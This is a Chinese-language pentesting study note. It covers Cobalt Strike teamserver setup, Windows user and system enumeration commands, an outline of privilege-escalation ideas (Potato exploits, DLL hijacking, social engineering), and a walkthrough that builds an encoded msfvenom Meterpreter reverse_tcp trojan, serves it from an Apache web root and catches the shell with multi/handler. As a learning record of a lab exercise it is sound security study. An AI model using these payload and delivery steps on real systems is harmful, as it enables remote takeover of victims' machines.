目录
安装CS
将CS文件解压过后,将文件中的server文件夹上传到VPS。
之后进入VPS,对其中的teamserver和TeamServerImage进行权限设置
对应命令chmod +x teamserver chmod +x TeamServerImage
之后可以进行服务端设置其格式为:”./teamserver your.ip your.password”
之后可以切到本机,或虚拟机中,开启CS文件中的client文件。打开里面的CS的vbs文件,之后进入连接画面
输入我们之前设置好的ip和password,点击连接即可。
用户组和用户、windows信息搜集命令
在Windows系统中,用户组和用户信息的搜集可以通过多种命令实现。以下是一些常用的命令及其功能总结:
一.查看所有用户:
命令: net user
功能: 列出系统中所有用户账户。
二.查看用户详细信息:
命令: net user [用户名]
功能: 显示指定用户的详细信息,包括全名、组成员身份、密码信息等。
三.查看所有用户组:
命令: net localgroup
功能: 列出系统中所有本地用户组。
四.查看用户组详细信息:
命令: net localgroup [组名]
功能: 显示指定用户组的详细信息,包括组成员。
五.查看计算机信息:
命令: systeminfo
功能: 显示计算机的详细配置信息,包括操作系统版本、内存、网络适配器等。
六.查看当前登录用户:
命令: whoami
功能: 显示当前登录用户的用户名。
七.查看用户登录历史:
命令: net user [用户名] | find "Last logon"
功能: 显示指定用户的最后登录时间。
手工提权思路,土豆提权
土豆提权
从网站上获取土豆家族的exe文件,有可能一次,两次会失败,可使用其他的土豆进行提权。
思路
手工提权(Privilege Escalation)是指攻击者通过各种手段提升其在系统中的权限,以获得更高的控制权。以下是一些常见的手工提权思路:
一.用户和组权限审计:
检查当前用户的权限和所属用户组,寻找具有更高权限的组(如管理员组)并尝试加入。
二.弱密码和凭证:
尝试使用常见的弱密码进行登录,或查找存储在文件中的凭证(如配置文件、脚本等)。
三.服务和计划任务:
检查系统中运行的服务和计划任务,寻找以高权限运行的服务,尝试利用其配置错误或漏洞。
四.文件和目录权限:
审计文件和目录的权限,寻找可写的系统文件(如 /etc/passwd 或 Windows 系统目录下的文件),尝试替换或修改。
五.漏洞利用:
查找系统和应用程序的已知漏洞,利用这些漏洞进行提权。
六.环境变量和配置文件:
检查环境变量和配置文件,寻找可能的敏感信息或错误配置。
七.DLL劫持:
利用DLL劫持技术,在高权限应用程序中注入恶意DLL。
八.内核漏洞:
如果有访问权限,可以尝试利用内核漏洞进行提权。
九.社交工程:
通过社交工程手段获取管理员的凭证或权限。
十.利用第三方软件:
检查系统中安装的第三方软件,寻找可能的提权漏洞。
CS插件提权
进入CS,点击左上角的CS,其中有脚本控制器(scripts),在这个模块中可以添加一些有用的插件或脚本,这些东西需自己下载,随后可以使用这些工具对其目标进行提权操作。
MSF提权
在这里我并没有直接将生成文件交付给目标,而是通过将文件移至apache服务目录中,使目标访问地址进行下载。
通过指令,生成一个木马文件
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=* LPORT=* -b "\x00" -e x86/shikata_ga_nai -f exe -o wang.exe
复制wang.exe木马文件到apache访问页,在kali linux上启动apache
root@wangzhike:~# cp wang.exe /var/www/html/
root@wangzhike:~# service apache2 start
root@wangzhike:~# service postgresql start
改名/var/www/html/目录中其他的测试页,避免访问出现其他画面
root@wangzhike:~# cd /var/www/html/
root@wangzhike:/var/www/html# ls
index.html index.nginx-debian.html wang.exe
root@wangzhike:/var/www/html# mv index.html index.html.bak
root@wangzhike:/var/www/html# mv index.nginx-debian.html index.nginx-debian.html.bak
本机访问你的虚拟机的ip
之后下载木马
利用exploit/multi/handler模块攻击
之后本机点击木马,虚拟机上显示监听,之后可进行提权操作。